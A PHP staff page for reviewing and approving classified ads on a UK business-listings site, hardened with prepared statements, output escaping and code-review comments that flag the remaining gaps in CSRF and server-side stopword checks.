<?php
   $path  = $_SERVER['DOCUMENT_ROOT'];
   include_once $path.'/connect_db.php';
   include '../accesscontrol.php';
   
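   // ACCEPT AND DECLINE SQL
   // Handles the staff decision posted by the form below: the edited ad fields are saved
   // and either `active` or `decline` is set. The flag fragment is picked from two fixed
   // literals, so no request data is ever placed in the SQL text.
   // NOTE(review): nothing in this handler re-checks the stopword list or verifies a CSRF
   // token; ../accesscontrol.php is not visible here, so confirm where those are enforced.
   $update_sql = !empty($_POST['accept']) ? '`active`=1' : (!empty($_POST['decline']) ? '`decline`=1' : '');

   if ($update_sql) {
       // adid used to be interpolated unquoted, a position where addslashes() gives no
       // protection, so it is now validated as an integer and bound as one.
       $adid = filter_var($_POST['adid'] ?? null, FILTER_VALIDATE_INT);
       if ($adid === false) {
           die('flop');
       }

       // Read a text field from the request; missing or non-string values become ''.
       $post_text = static function (string $key): string {
           $value = $_POST[$key] ?? '';
           return is_string($value) ? $value : '';
       };
       $desc  = $post_text('description');
       $name  = $post_text('companyname');
       $email = $post_text('email');
       $url   = $post_text('url');

       // $connect is used as a mysqli connection elsewhere in this file (->error,
       // fetch_assoc()), so the values are sent as bound parameters instead of being
       // escaped into the statement.
       $stmt = $connect->prepare(
           "UPDATE ads SET description=?,companyname=?,email=?,url=?,{$update_sql} WHERE adid=?"
       );
       if (!$stmt) {
           die('flop');
       }
       $stmt->bind_param('ssssi', $desc, $name, $email, $url, $adid);
       $q = $stmt->execute();
       $stmt->close();

       if ($q) {
           // Move on to the next pending ad.
           echo "<script>location.href='./approvals.php'</script>";
           exit;
       } else {
           die('flop');
       }
   }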
   
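   // Pick one random ad that is completed but neither approved nor declined yet.
   // (To review a specific ad while debugging, add e.g. "adid=20135 AND" to the WHERE clause.)
   $a = $connect->query("SELECT * FROM ads WHERE active=0 AND completed='1' AND decline='0' ORDER BY RAND() LIMIT 1");
   if ($a === false) {
       // Keep the driver's error text in the server log rather than in the response.
       error_log('approvals: pending-ad query failed: ' . $connect->error);
       die('Database error');
   }

   $r = $a->fetch_assoc();
   if (!$r) {
       // No pending ad: stop here instead of rendering a form with an empty adid.
       exit('No ads are waiting for approval.');
   }
   // The former debug dump (print_r($r) inside an HTML comment) is removed: it wrote every
   // column of the row into the page, and a "-->" inside advertiser-supplied text would
   // end the comment and let the rest of that text be parsed as markup.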
   
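   //STOPWORDS
   // $accept holds the markup echoed at the top of the form: the Accept button, or a
   // notice naming a stopword found in the ad description (which hides the button).
   // NOTE(review): this only hides the button; the POST handler in this file still
   // honours an "accept" field, so the list is not enforced on the server.
   $accept = ' <button name="accept" value="1" class="button green" style="margin-right:20px;">Accept</button>  ';

   $stopword_list = file_get_contents('stopwords.txt');
   if ($stopword_list === false) {
       // Fail closed: without the list the ad cannot be screened, so do not offer Accept.
       $accept = 'Stopword list could not be read';
       $stopwords = [];
   } else {
       $stopwords = explode(',', $stopword_list);
   }

   $ad_text = (string) ($r['description'] ?? '');
   foreach ($stopwords as $stopword) {
       // Entries may carry a newline or padding from the file; an empty entry would
       // otherwise match any double space in the description.
       $stopword = trim($stopword);
       if ($stopword === '') {
           continue;
       }
       // Case-sensitive, and only matches the word with a space on both sides.
       if (strpos($ad_text, ' ' . $stopword . ' ') !== false) {
           $accept = 'Stopword: ' . htmlspecialchars($stopword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
       }
   }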
   
   
   
   /* -- DESCRIPTION CLEAN-UP -- */
   // Builds $description, the tidied copy of the ad text that pre-fills the textarea.
   // The steps run in a fixed order; each one works on the output of the previous one.

   // Drop bytes that are not valid UTF-8, then turn &nbsp; entities into plain spaces.
   $description = str_replace('&nbsp;', ' ', iconv("UTF-8", "UTF-8//IGNORE", $r['description']));

   // Redaction of phone numbers and e-mail addresses ("(available on request)") is
   // switched off. NOTE(review): the retired patterns used character classes such as
   // [\+447||07] and [a-zA-z]; they need rewriting before this is re-enabled.

   // A lone digit surrounded by whitespace becomes its word (" 3 " -> " three ").
   $number_words = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine'];
   foreach ($number_words as $digit => $spelled) {
       $description = preg_replace('#\s(' . $digit . ')\s#', ' ' . $spelled . ' ', $description);
   }

   // Upper-case the first character of every run of sentence characters.
   $description = preg_replace_callback(
       '#&*([A-Za-z0-9\s\/\(\),\-&;\']+)#',
       static function ($run) {
           return ucfirst($run[0]);
       },
       $description
   );

   // Put a space after every full stop, then undo that inside the listed abbreviations
   // (the abbreviation lookup ignores case).
   $exceptions = ['a.m', '..', 'p.m', 'e.g'];
   $spaced_out = array_map(
       static function ($abbr) {
           return str_replace('.', '. ', $abbr);
       },
       $exceptions
   );
   $description = str_ireplace($spaced_out, $exceptions, str_replace('.', '. ', $description));

   // Collapse tripled, then doubled, "?", "!" and spaces into a single character.
   $punctuation = ['?', '!', ' '];
   foreach ($punctuation as $mark) {
       $description = str_replace([$mark . $mark . $mark, $mark . $mark], $mark, $description);
   }

   // 200k -> 200,000
   $description = preg_replace('/([0-9]+)k/', '$1,000', $description);

   // 6yrs -> 6 years
   $description = preg_replace('/([0-9]+)yrs /', '$1 years ', $description);

   // word , word -> word, word
   $description = str_replace(' , ', ', ', $description);

   // Expand common abbreviations when followed by a space, a full stop or a newline.
   $replacements = [
       'yrs' => 'years',
       'ono' => 'on nearest offer',
       'pa'  => 'per annum',
       'SAV' => 'stock at valuation',
       'uk'  => "UK",
   ];
   foreach ($replacements as $short => $long) {
       $description = str_ireplace(
           [" $short ", " $short.", " $short\n"],
           [" $long ", " $long.", " $long\n"],
           $description
       );
   }
   ?>
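<?php
// Approval form for the ad row in $r. Every value that comes from the ads table is
// advertiser-supplied text shown to a logged-in staff member, so it is HTML-escaped at
// the point of output (text and quoted-attribute context).
// NOTE(review): the page declares windows-1252 in its <meta> tag while the PHP above
// treats the description as UTF-8; confirm which encoding the stored data really uses.
$html_escape = static function ($value): string {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
?>
<!DOCTYPE html>
<html>
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
      <title>YellowLeaf UK</title>
      <link rel="stylesheet" href="/header-footer/global.css">
      <link rel="stylesheet" href="/staff/style_staff.css">
   </head>
   <style>
      .cn{width:980px;margin:auto;}
      label{display:block;margin:20px 0 5px;font-weight:bold}
      input,textarea{display:block;border:1px solid #ccc;border-radius:3px;width:100%;padding:5px;}
      #photos > div{background:#eee;border:1px solid #ccc;border-radius:3px;padding:30px 30px;margin-top:10px;}
      #photos img{max-height:120px;}
      .button {
      background-color: #4CAF50; /* Green */
      border: none;
      color: white;
      padding: 15px 32px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 16px;
      }
      .button.green {background-color: #4CAF50;} /* Green */
      .button.blue {background-color: #008CBA;} /* Blue */
      .button.red {background-color: #f44336;} /* Red */
      .button.gray {background-color: #e7e7e7; color: black;} /* Gray */
      .button.black {background-color: #555555;} /* Black */
   </style>
   <body>
      <?php /* Full open tag: a short "<?" tag is emitted as plain text when short_open_tag is off. */ ?>
      <?php include '../staff_header.php' ?>
      <div class="table-section">
         <div class="container lg">
            <div class="cn">
               <form method="POST">
                  <input type="hidden" name="adid" value="<?=$html_escape($r['adid'])?>" />
                  <?php /* $accept is markup assembled earlier in this file (button or stopword notice), so it is echoed as-is. */ ?>
                  <?=$accept ?>
                  <button type="submit" value="1" name="decline" class="button red">Decline</button>
                  <h1>Ad id <?=$html_escape($r['adid'])?></h1>
                  <section id="photos">
                     <div>
                        <?=($r['image']?'<img itemprop="photo" class="photo" src="/members/uploads/logo/'.$html_escape($r['image']).'" border="0">':'')?>
                        <?=($r['photo_1']?'<img id="bigP" class="bpic" src="/members/uploads/1/'.$html_escape($r['photo_1']).'">':'')?>
                        <?=($r['photo_2']?'<img id="bigP" class="bpic" src="/members/uploads/2/'.$html_escape($r['photo_2']).'">':'')?>
                        <?=($r['photo_3']?'<img id="bigP" class="bpic" src="/members/uploads/3/'.$html_escape($r['photo_3']).'">':'')?>
                        <?=($r['photo_4']?'<img id="bigP" class="bpic" src="/members/uploads/4/'.$html_escape($r['photo_4']).'">':'')?>
                     </div>
                  </section>
                  <h2>Details</h2>
                  <label>Company Name: </label><input type="text" name="companyname" value="<?=$html_escape($r['companyname'])?>">
                  <label>Description: </label>
                  <?php /* Escaping also keeps entities in the stored text (e.g. "&amp;") intact when the form is posted back. */ ?>
                  <textarea rows="12"  name="description"><?=$html_escape($description)?></textarea>
                  <label>Email: </label><input type="text"  name="email" value="<?=$html_escape($r['email'])?>">
                  <label>Url: </label><input type="text"  name="url" value="<?=$html_escape($r['url'])?>">
                  <?php /* The link opens an advertiser-chosen site: rel="noopener noreferrer" keeps that page from reaching window.opener. */ ?>
                  <a href="//<?=$html_escape(str_replace(['https:','http:'],'',$r['url']))?>" target="_blank" rel="noopener noreferrer">Check Website</a>
               </form>
            </div>
         </div>
      </div>
   </body>
</html>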
